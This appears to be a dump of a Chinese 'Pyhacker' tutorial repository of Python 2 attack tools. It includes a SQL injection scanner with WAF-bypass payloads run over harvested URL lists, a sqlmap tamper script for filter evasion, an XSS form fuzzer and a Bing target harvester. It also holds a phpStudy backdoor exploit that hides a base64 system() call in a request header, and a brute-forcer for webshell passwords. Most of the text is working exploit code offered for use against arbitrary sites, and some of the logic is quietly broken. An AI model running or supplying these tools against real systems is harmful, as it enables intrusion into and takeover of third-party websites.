![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/2.png) 38 | 39 | 整理一下代码: 40 | 41 | ``` 42 | def url_bypass(url): 43 | r = r'\?(.*)' 44 | id = re.findall(r,url) 45 | id = id[0] 46 | payload = "?a=/*&{}%20and%201=1%23*/".format(id) 47 | 48 | urlr = '(.*)\?%s'%id 49 | url_ = re.findall(urlr,url) 50 | url_=url_[0] 51 | print url_+payload 52 | 53 | url = 'http://127.0.0.1/index.php?id=1' 54 | url_bypass(url) 55 | ``` 56 | 57 | 存放到列表当中,等下我们直接遍历即可 58 | 59 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/3.png) 60 | 61 | **00x3:** 62 | 63 | 下面来说一下判断原理: 64 | 65 | 1)?a=/*&id=1%20and%201=1%23*/ 返回正常 66 | 67 | 2)?a=/*&id=1%20and%201=2%23*/ 返回错误 68 | 69 | 1)xor 1=1 返回错误 70 | 71 | 2)Xor 1=2 返回正常 72 | 73 | 判断1 != 2 则存在SQL注入漏洞(如上两条语句都可以测试) 74 | 75 | 我们分别利用两个请求测试,这样代码方便易读 76 | 77 | ``` 78 | def req1(url): 79 | global html1 80 | headers = { 81 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 82 | } 83 | req = requests.get(url,headers=headers,verify=False,timeout=3) 84 | html1 = req.content 85 | 86 | def req2(url): 87 | global html2 88 | headers = { 89 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 90 | } 91 | req = requests.get(url,headers=headers,verify=False,timeout=3) 92 | html2 = req.content 93 | ``` 94 | 95 | **00x4:** 96 | 97 | 判断SQL注入漏洞 98 | 99 | ``` 100 | def main(): 101 | req1(urls[0]) 102 | req2(urls[1]) 103 | if html1 != html2: 104 | print "[+] Find SQL" 105 | else: 106 | print "NO" 107 | ``` 108 | 109 | 调试一下: 110 | 111 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/4.png) 112 | 113 | **00x5:** 114 | 115 | 配和前面的教程,我们已经可以采集url,并且深度爬取 116 | 117 | 采集就不在这里说了,你可以自己去采集一些url 118 | 119 | 遍历url 判断SQL注入漏洞: 120 | 121 | ``` 122 | if __name__ == '__main__': 123 | f = open('url.txt','r') 124 | for url in f: 125 | url = url.strip() 126 | url_bypass(url) # c处理url 127 | main() #判断SQL 128 | urls = [] #清空列表 129 | ``` 130 | 131 | 自动输出结果我就不写了 132 | 133 | 前面也讲了,大家可以根据自己需求修改 134 | 135 | **00x6:** 136 | 137 | 完整代码:/books/config/7.[Pyhacker]Sql脚本编写 138 | 139 | ``` 140 | #!/usr/bin/python 141 | #-*- coding:utf-8 -*- 142 | import requests 143 | import re 144 | import urllib3 145 | urllib3.disable_warnings() 146 | 147 | urls = [] 148 | def url_bypass(url): 149 | r = r'\?(.*)' 150 | id = re.findall(r,url) 151 | id = id[0] 152 | payload = "?a=/*&{}%20and%201=1%23*/".format(id) 153 | 154 | r2 = r'\?(.*)' 155 | id2 = re.findall(r2,url) 156 | id2 = id2[0] 157 | payload2 = "?a=/*&{}%20and%201=2%23*/".format(id2) 158 | 159 | urlr = '(.*)\?%s'%id 160 | url_ = re.findall(urlr,url) 161 | url_=url_[0] 162 | url_bypass = url_+payload 163 | url_bypass2 = url_ + payload2 164 | urls.append(url_bypass) 165 | urls.append(url_bypass2) 166 | 167 | def req1(url): 168 | global html1 169 | headers = { 170 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 171 | } 172 | req = requests.get(url,headers=headers,verify=False,timeout=3) 173 | html1 = req.content 174 | 175 | def req2(url): 176 | global html2 177 | headers = { 178 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 179 | } 180 | req = requests.get(url,headers=headers,verify=False,timeout=3) 181 | html2 = req.content 182 | 183 | def main(): 184 | try: 185 | req1(urls[0]) 186 | req2(urls[1]) 187 | if html1 != html2: 188 | print "[+] Find SQL",urls[1] 189 | else: 190 | pass 191 | except: 192 | pass 193 | 194 | if __name__ == '__main__': 195 | f = open('url.txt','r') 196 | for url in f: 197 | url = url.strip() 198 | url_bypass(url) # c处理url 199 | main() #判断SQL 200 | urls = [] #清空列表 201 | ``` 202 | 203 | 这里仅以SQL判断思路进行编写,猜测数据库等操作也相同 204 | 205 | 抛砖引玉,只需要更换sql语句,利用for循环即可 206 | 207 | 大致思路:(延时注入获取数据库) 208 | 209 | payloads='abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' 210 | 211 | 遍历payloads 212 | 213 | 判断延迟时间,利用time比较,如果时间大于xxx,则字符存在 214 | 215 | ``` 216 | for x in payloads: 217 | url+and if(length(user)=%s,3,0)%x 218 | ``` 219 | 220 | ## Pyhacker 之 SQLMAP tamper编写 221 | 222 | tamper是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 223 | 224 | 一个简单的tamper: 225 | 226 | ``` 227 | from lib.core.enums import PRIORITY 228 | __priority__ = PRIORITY.LOWEST 229 | def dependencies(): 230 | pass 231 | def tamper(payload, **kwargs): 232 | return payload.replace("'", "\\'").replace('"', '\\"') 233 | ``` 234 | 235 | 我们只需要修改这两部分: 236 | 237 | Priority定义脚本的优先级(默认lowest即可) 238 | 239 | tamper是主要的函数,接受的参数为payload和kwargs 240 | 241 | 返回值为替换后的payload。比如这个例子中就把引号替换为了\\ 242 | 243 | ``` 244 | def tamper(payload, **kwargs): 245 | headers = kwargs.get("headers", {}) 246 | headers["X-originating-IP"] = "127.0.0.1" 247 | return payload 248 | ``` 249 | 250 | 修改X-originating-IP 绕过Waf 251 | 252 | 所以我们只需要仿造进行修改,即可写出我们的tamper 253 | 254 | 我们来测试一下 255 | 256 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/5.png) 257 | 258 | 我们修改源代码,关键词 替换为空 259 | 260 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/6.png) 261 | 262 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/7.png) 263 | 264 | OK,没毛病 265 | 266 | 替换为空了,我们可以利用两个seleselectct 绕过 267 | 268 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/8.png) 269 | 270 | 测试一下: 271 | 272 | ```Sqlmap.py -u “http://127.0.0.1/news.php?id=1” --purge``` 273 | 274 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/9.png) 275 | 276 | 已经注入不出来结果了,我们来写一个tamper 277 | 278 | 利用replace函数进行替换字符 279 | 280 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/10.png) 281 | 282 | 完整tamper:/books/config/7.[Pyhacker]Sql脚本编写 283 | 284 | ``` 285 | #!/usr/bin/python 286 | #-*- coding:utf-8 -*- 287 | 288 | #默认开头 289 | from lib.core.enums import PRIORITY 290 | __priority__ = PRIORITY.LOW #等级(LOWEST 最低级) 291 | 292 | #可有可无 293 | def dependencies(): 294 | pass 295 | 296 | def tamper(payload, **kwargs): 297 | playload = payload.replace('and','anandd') 298 | playload = playload.replace('xor', 'xoxorr') 299 | playload = playload.replace('select', 'selselectect') 300 | playload = playload.replace('union', 'uniunionon') 301 | playload = playload.replace('if', 'iiff') 302 | return playload 303 | ``` 304 | 305 | 放到tamper目录下 306 | 307 | ```Sqlmap.py -u “http://127.0.0.1/news.php?id=1” --purge --tamper “andand.py”``` 308 | 309 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/11.png) 310 | 311 | OK,已经注入出来了 312 | 313 | 方法大同小异,了解waf特征,fuzz bypass 314 | -------------------------------------------------------------------------------- /books/0x8.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 Xss检测 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | **00x2:** 10 | 11 | 大致思路: 12 | 13 | 每次插入一个xss,判断网页内容是否存在,如果存在则输出 14 | 15 | ``` 16 | def req(url,xss): 17 | headers = { 18 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 19 | } 20 | req = requests.get(url=url+xss,headers=headers,verify=False,timeout=3) 21 | print u"正在测试",url,xss 22 | if xss in req.content: 23 | print "[+]Find Xss url:%s payload:%s"%(url,xss) 24 | ``` 25 | 26 | 为了方便测试,我们先定义一个payload列表 27 | 28 | ``` 29 | xss = ["", 30 | "%3Cscript%3Ealert('XSS')%3C/script%3E", 31 | '">ript>alert(/xss/)', 32 | "" 33 | ] 34 | ``` 35 | 36 | **00x3:** 37 | 38 | 修改一下源代码,过滤script 39 | 40 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/1.png) 41 | 42 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/2.png) 43 | 44 | ok,一切正常 45 | 46 | **00x4:** 47 | 48 | 我们来运行一下,遍历xss payload 49 | 50 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/3.png) 51 | 52 | 你也可以定义一个xss.txt,进行读取,然后遍历xss fuzz 53 | 54 | (post请求也是如此,只需要一个post请求即可) 55 | 56 | 你也可以加上 如果存在xss则退出 57 | 58 | **00x5:** 59 | 60 | 代码如下: 61 | 62 | ``` 63 | #!/usr/bin/python 64 | #-*- coding:utf-8 -*- 65 | import requests 66 | import urllib3 67 | urllib3.disable_warnings() 68 | 69 | def req(url,xss): 70 | url = url + xss 71 | headers = { 72 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 73 | } 74 | req = requests.get(url,headers=headers,verify=False,timeout=3) 75 | print u"正在测试",url 76 | if xss in req.content: 77 | print "[+]Find Xss url:%s payload:%s"%(url,xss) 78 | 79 | xss = ["", 80 | "%3Cscript%3Ealert('XSS')%3C/script%3E", 81 | '">ript>alert(/xss/)', 82 | "" 83 | ] 84 | 85 | for x in xss: 86 | req('http://127.0.0.1/xss.php?xss_input=1',x) 87 | ``` 88 | 89 | **00x6:** 90 | 91 | 当然这只是一个最简单的模型,下面我们来进行维护加强一下 92 | 93 | 94 | 95 | 思路: 96 | 97 | 我们可以匹配网页的form标签(表单提交),然后获取请求方式,以及请求参数,模拟请求,进行fuzz 98 | 99 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/4.png) 100 | 101 | ``` 102 | def html(url): 103 | headers = { 104 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 105 | } 106 | req = requests.get(url,headers=headers,verify=False,timeout=3) 107 | r =r'' 108 | form = re.findall(r,req.content,re.S) 109 | print form 110 | ``` 111 | 112 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/5.png) 113 | 114 | 接着我们去获取他的请求方式,以及请求参数 115 | 116 | ``` 117 | method=re.findall(r'method="(.*?)"',str(form)) 118 | print method 119 | name = re.findall(r'name="(.*?)"', str(form)) 120 | print name 121 | ``` 122 | 123 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/6.png) 124 | 125 | Ok,我们设置全局变量,方便调用 126 | 127 | ``` 128 | global method,name 129 | ``` 130 | 131 | **00x7:** 132 | 133 | 添加判断,自动fuzz 134 | 135 | ``` 136 | if method[0] == 'get' or 'GET': 137 | req = requests.get(url=url+"?"+name[0]+"="+xss,headers=headers,verify=False,timeout=3) 138 | print u"正在测试",url,xss 139 | if xss in req.content: 140 | print "[+]Find Get Xss url:%s payload:%s"%(url,xss) 141 | if method[0] == 'post' or 'POST': 142 | data={name[0]:xss} 143 | req = requests.post(url=url,data=data,headers=headers,verify=False,timeout=3) 144 | print u"正在测试",url,xss 145 | if xss in req.content: 146 | print "[+]Find Post Xss url:%s payload:%s"%(url,xss) 147 | ``` 148 | 149 | 我们修改为post请求来测试一下 150 | 151 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/7.png) 152 | 153 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/8.png) 154 | 155 | **00x8:** 156 | 157 | 为了更人性化,我们再修改一下,导入sys模块 158 | 159 | sys.exit() 表示退出程序 160 | 161 | ``` 162 | def html(url): 163 | global method,name 164 | headers = { 165 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 166 | } 167 | req = requests.get(url,headers=headers,verify=False,timeout=3) 168 | r =r'' 169 | form = re.findall(r,req.content,re.S) 170 | method=re.findall(r'method="(.*?)"',str(form)) 171 | name = re.findall(r'name="(.*?)"', str(form)) 172 | try: 173 | if method==None or name==None: 174 | sys.exit(0) 175 | else: 176 | print u"\nFind method = %s name = %s\n"%(method[0],name[0]) 177 | except: 178 | print u"\n自动分析失败!" 179 | sys.exit(0) 180 | ``` 181 | 182 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/8/9.png) 183 | 184 | **00x9:** 185 | 186 | 完整代码:/books/config/8.[Pyhacker]Xss检测 187 | 188 | ``` 189 | #!/usr/bin/python 190 | #-*- coding:utf-8 -*- 191 | import requests,re,sys 192 | import urllib3 193 | urllib3.disable_warnings() 194 | 195 | def req(url,xss): 196 | headers = { 197 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 198 | } 199 | if method[0] == 'get' or 'GET': 200 | req = requests.get(url=url+"?"+name[0]+"="+xss,headers=headers,verify=False,timeout=3) 201 | print u"正在测试",url,xss 202 | if xss in req.content: 203 | print "[+]Find Get Xss url:%s payload:%s"%(url,xss) 204 | sys.exit(1) 205 | if method[0] == 'post' or 'POST': 206 | data={name[0]:xss} 207 | req = requests.post(url=url,data=data,headers=headers,verify=False,timeout=3) 208 | print u"正在测试",url,xss 209 | if xss in req.content: 210 | print "[+]Find Post Xss url:%s payload:%s"%(url,xss) 211 | sys.exit(1) 212 | 213 | def html(url): 214 | global method,name 215 | headers = { 216 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 217 | } 218 | req = requests.get(url,headers=headers,verify=False,timeout=3) 219 | r =r'' 220 | form = re.findall(r,req.content,re.S) 221 | method=re.findall(r'method="(.*?)"',str(form)) 222 | name = re.findall(r'name="(.*?)"', str(form)) 223 | try: 224 | if method==None or name==None: 225 | sys.exit(0) 226 | else: 227 | print u"\nFind method = %s name = %s\n"%(method[0],name[0]) 228 | except: 229 | print u"\n自动分析失败!" 230 | sys.exit(0) 231 | 232 | 233 | if __name__ == '__main__': 234 | url = raw_input('\nurl:') 235 | if 'http' not in url: 236 | url = 'http://'+url 237 | xss = ["", 238 | "%3Cscript%3Ealert('XSS')%3C/script%3E", 239 | '">ript>alert(/xss/)', 240 | "" 241 | ] 242 | 243 | html(url) 244 | for x in xss: 245 | req(url,x) 246 | ``` 247 | 248 | 文章写到这里就结束了,但还是存在一些缺陷,比如表单有多个name,所以你需要去加载多个name,进行请求,这里就不修改了,仅抛砖引玉,希望你可以开发出自己的大项目! 249 | -------------------------------------------------------------------------------- /books/0x9.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 调用第三方接口 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | import re 10 | 11 | **00x2:** 12 | 13 | 为什么要讲这个呢,因为在网上有很多现场的接口,我们只需要调用就可完成一个简单的程序,这样可以方便很多 14 | 15 | 比如这里有一个反查的接口: 16 | 17 | https://api.hackertarget.com/reverseiplookup/?q=hackxc.cc 18 | 19 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/9/1.png) 20 | 21 | 这个比较方便,也不需要进行匹配,直接输出域名 22 | 23 | 那我们可以直接获取网页源代码即可 24 | 25 | 直接给出完整代码: 26 | 27 | ``` 28 | #!/usr/bin/python 29 | # -*- coding:utf-8 -*- 30 | import requests,re 31 | 32 | def demo(url): 33 | headers = { 34 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 35 | } 36 | url = 'https://api.hackertarget.com/reverseiplookup/?q=%s'%url 37 | req = requests.get(url,headers=headers) 38 | html = req.content 39 | print html 40 | 41 | if __name__ == '__main__': 42 | url = raw_input("\nurl:") 43 | print u"正在查询,请稍后...\n" 44 | demo(url) 45 | ``` 46 | 47 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/9/2.png) 48 | 49 | **00x3:** 50 | 51 | 不仅如此,只要是搭建在web的,我们利用python都可以利用 52 | 53 | 网上还有很多的api接口,这里分享两个 54 | 55 | ``` 56 | https://api.oioweb.cn/ 57 | http://api.btstu.cn/ 58 | ``` 59 | 60 | 我们只需要调用即可 61 | 62 | 如:QQ业务查询 63 | 64 | https://api.oioweb.cn/api/Membereq.php?qq=758682207 65 | 66 | 思路还是一样 67 | 68 | ``` 69 | #!/usr/bin/python 70 | # -*- coding:utf-8 -*- 71 | import requests,re 72 | 73 | def demo(qq): 74 | headers = { 75 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 76 | } 77 | url = 'https://api.oioweb.cn/api/Membereq.php?qq=%s'%qq 78 | req = requests.get(url,headers=headers) 79 | html = req.text 80 | print html 81 | 82 | if __name__ == '__main__': 83 | url = raw_input("\nQQ:") 84 | print u"正在查询,请稍后...\n" 85 | demo(url) 86 | ``` 87 | 88 | 我们只需要截取我们想要的内容即可 89 | 90 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/9/3.png) 91 | 92 | 第一种方法还是利用我们的正则,但这里是json格式的代码,我们可以直接利用json格式输出,正则我们就在这里先不用了,前面都是正则的思路,现在用json 93 | 94 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/9/4.png) 95 | 96 | 代码很乱,看不懂下面返回的怎么办 97 | 98 | 浏览器F12,在网络就可以看到json格式 99 | 100 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/9/5.png) 101 | 102 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/9/6.png) 103 | 104 | **00x4:** 105 | 106 | 完整代码:/books/config/9.[Pyhacker]调用第三方接口 107 | 108 | ``` 109 | #!/usr/bin/python 110 | # -*- coding:utf-8 -*- 111 | import requests,re 112 | 113 | def demo(qq): 114 | headers = { 115 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 116 | } 117 | url = 'https://api.oioweb.cn/api/Membereq.php?qq=%s'%qq 118 | req = requests.get(url,headers=headers) 119 | html = req.json() 120 | print u"开通业务如下:" 121 | for x in html['data']['name']: 122 | print x 123 | 124 | if __name__ == '__main__': 125 | url = raw_input("\nQQ:") 126 | print u"正在查询,请稍后...\n" 127 | demo(url) 128 | ``` 129 | -------------------------------------------------------------------------------- /books/config/1.[Pyhacker]Url采集/Bing_url.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | import re 5 | 6 | urls = [] 7 | url_ok = [] 8 | url_bing=[] 9 | 10 | def req(q,first): 11 | global html 12 | url = 'https://cn.bing.com/search?q=%s&first=%s'%(q,first) 13 | print url 14 | headers = { 15 | 'Host':'cn.bing.com', 16 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0', 17 | 'Cookie': '_EDGE_V=1;' 18 | } 19 | req = requests.get(url,headers=headers) 20 | html = req.content 21 | 22 | def reurl():#正则匹配url 23 | urlr = r'target="_blank" href="(http.*?\..*?\..*?)" h="' 24 | reurl = re.findall(urlr,html) 25 | for url in reurl: 26 | if url not in urls: 27 | urls.append(url) 28 | 29 | def url():#url二次处理 30 | for url in urls: 31 | urlr = r'(http[s]?://.*?)/' 32 | url = re.findall(urlr,url) 33 | url_ok.append(url[0]) 34 | 35 | def qc():#去重复 36 | for url in url_ok: 37 | if url in url_bing: 38 | continue 39 | url_bing.append(url) 40 | 41 | if __name__ == '__main__': 42 | q = raw_input('\nkey:') 43 | page = input('page:') 44 | for first in range(0, page): 45 | req(q, first * 10) 46 | reurl() 47 | url() 48 | qc() 49 | with open('url_bing.txt','a+')as f: 50 | for url in url_bing: 51 | print url 52 | f.write(url+"\n") 53 | print "Save as url_bing.txt" -------------------------------------------------------------------------------- /books/config/1.[Pyhacker]Url采集/url_demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/1.[Pyhacker]Url采集/url_demo.gif -------------------------------------------------------------------------------- /books/config/10.[Pyhacker]漏洞Poc编写/Poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | headers = { 5 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0', 6 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 7 | 'Accept-Encoding':'gzip,deflate', 8 | 'Accept-Charset':'c3lzdGVtKCJlY2hvIHhjNjY2YSIpOw==', 9 | 'Accept-Language':'zh-CN,zh;q=0.9', 10 | 'Connection':'close', 11 | } 12 | 13 | def phpstudy(url): 14 | try: 15 | if 'http' not in url: 16 | url = 'http://' + url 17 | r = requests.get(url=url, headers=headers,timeout=5) 18 | if 'xc666' in r.text: 19 | print u'over success:',url 20 | with open('success.txt','a+') as f: 21 | f.write(url+"\n") 22 | else: 23 | print u'flase:',url 24 | except: 25 | print u'连接超时',url 26 | 27 | if __name__ == '__main__': 28 | url = raw_input('\nurl:') 29 | phpstudy(url) -------------------------------------------------------------------------------- /books/config/10.[Pyhacker]漏洞Poc编写/success.txt: -------------------------------------------------------------------------------- 1 | http://127.0.0.1 2 | -------------------------------------------------------------------------------- /books/config/11.[Pyhacker]爆破一句话木马/Shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | 5 | def req(url,s,ss,sss,ssss,sssss): 6 | global html 7 | data = {s:'echo xc666%s;'%s, 8 | ss:'echo xc666%s;'%ss, 9 | sss:'echo xc666%s;'%sss, 10 | ssss:'echo xc666%s;'%ssss, 11 | sssss:'echo xc666%s;'%sssss,} 12 | req = requests.post(url,data=data) 13 | html = req.content 14 | print req.url,s,ss,sss,ssss,sssss 15 | 16 | shell = [] 17 | def shelllist(): 18 | f = open('shell.txt','r') 19 | for x in f.readlines(): #去除换行等字符 20 | x = x.strip() 21 | shell.append(x) 22 | print u"\nshell密码个数为:",len(shell) 23 | 24 | def main(): 25 | shelllist() 26 | url = raw_input('\nshell url:') 27 | if 'http' not in url: 28 | url = 'http://'+url 29 | for i in range(0,len(shell),5): #分割列表 30 | b=shell[i:i+5] 31 | req(url,b[0],b[1],b[2],b[3],b[4]) 32 | if "xc666%s"%b[0] in html: 33 | print "\n[+]Find password",b[0] 34 | break 35 | elif "xc666%s"%b[1] in html: 36 | print "\n[+]Find password", b[1] 37 | break 38 | elif "xc666%s"%b[2] in html: 39 | print "\n[+]Find password",b[2] 40 | break 41 | elif "xc666%s"%b[3] in html: 42 | print "\n[+]Find password", b[3] 43 | break 44 | elif "xc666%s"%b[4] in html: 45 | print "\n[+]Find password", b[4] 46 | break 47 | if __name__ == '__main__': 48 | main() -------------------------------------------------------------------------------- /books/config/11.[Pyhacker]爆破一句话木马/shell.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/11.[Pyhacker]爆破一句话木马/shell.gif -------------------------------------------------------------------------------- /books/config/11.[Pyhacker]爆破一句话木马/shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/11.[Pyhacker]爆破一句话木马/shell.txt -------------------------------------------------------------------------------- /books/config/12.[Pyhacker]调用外部命令/Cmd_powershell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import os 4 | import subprocess 5 | 6 | # os.system('whoami') #cmd 7 | # 8 | # args = [r"powershell", r"whoami"] #调出powershell,后面是执行的命令 9 | # subprocess.call(args) 10 | # 11 | # subprocess.call('whoami') #cmd 12 | 13 | args = [r"arp", r"-a"] #命令拼接 14 | subprocess.call(args) -------------------------------------------------------------------------------- /books/config/13.[Pyhacker]自动生成网页报告/Report.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/13.[Pyhacker]自动生成网页报告/Report.gif -------------------------------------------------------------------------------- /books/config/13.[Pyhacker]自动生成网页报告/Report.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | 4 | def jieguo(sql): 5 | global html 6 | html = ''' 7 | 8 | 9 | 10 | 扫描结果 11 | 12 | 13 |
14 |

15 |

扫描结果

16 |
17 |
18 | %s 19 |
20 | 21 | 22 | '''%sql 23 | 24 | def main(): 25 | sql = "[+] Find sql http://127.0.0.1/news.php?id=1" 26 | jieguo(sql) 27 | f = open('jieguo.html','w+') 28 | f.write(html) 29 | f.close() 30 | 31 | if __name__ == '__main__': 32 | main() 33 | print u"Save to jieguo.html" -------------------------------------------------------------------------------- /books/config/13.[Pyhacker]自动生成网页报告/jieguo.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 扫描结果 6 | 7 | 8 |
9 |

10 |

扫描结果

11 |
12 |
13 | [+] Find sql http://127.0.0.1/news.php?id=1 14 |
15 | 16 | 17 | -------------------------------------------------------------------------------- /books/config/14.[Pyhacker]打造完美命令界面/hello_word.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/14.[Pyhacker]打造完美命令界面/hello_word.exe -------------------------------------------------------------------------------- /books/config/14.[Pyhacker]打造完美命令界面/hello_word.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | 4 | print 'hello word' -------------------------------------------------------------------------------- /books/config/14.[Pyhacker]打造完美命令界面/ico.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/14.[Pyhacker]打造完美命令界面/ico.ico -------------------------------------------------------------------------------- /books/config/14.[Pyhacker]打造完美命令界面/test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | from optparse import OptionParser 4 | 5 | # print ''' 6 | # _ _ 7 | # | |__ __ _ ___| | ____ _____ 8 | # | '_ \ / _` |/ __| |/ /\ \/ / __| 9 | # | | | | (_| | (__| < > < (__ 10 | # |_| |_|\__,_|\___|_|\_\/_/\_\___| 11 | # 12 | # ''' 13 | 14 | usage = ("Usage: test.py -u target") 15 | parser = OptionParser(usage=usage) #实例化对象 16 | parser.add_option('-u','--url',dest='url',help='help') #设置参数 17 | (options,args)=parser.parse_args() #把参数值传递给options 18 | url = options.url 19 | if url == None: 20 | print usage 21 | 22 | 23 | -------------------------------------------------------------------------------- /books/config/15.[Pyhacker]你可能会用到的模块/module.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | # import random 4 | # 5 | # listx = ['xc','www.hackxc.cc','bypass'] 6 | # random.shuffle(listx) #元素打乱 7 | # print listx 8 | 9 | # import time 10 | # 11 | # print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) #输出格式化时间 12 | 13 | 14 | # import platform 15 | # 16 | # print platform.machine() #平台架构 17 | # print platform.node() #主机名 18 | # print platform.platform() #操作系统 19 | # print platform.processor() #处理器 20 | # print platform.system() #系统类型 21 | 22 | # import sys,time 23 | 24 | # print sys.argv #获取多个参数 25 | # print sys.argv[0] #再次输出 26 | # sys.exit("Error") #退出 27 | # port = sys.argv[1:] #传递多个参数 28 | # print port 29 | 30 | # for x in range(1,10): 31 | # sys.stdout.write('\r%s'%x) 32 | # time.sleep(2) -------------------------------------------------------------------------------- 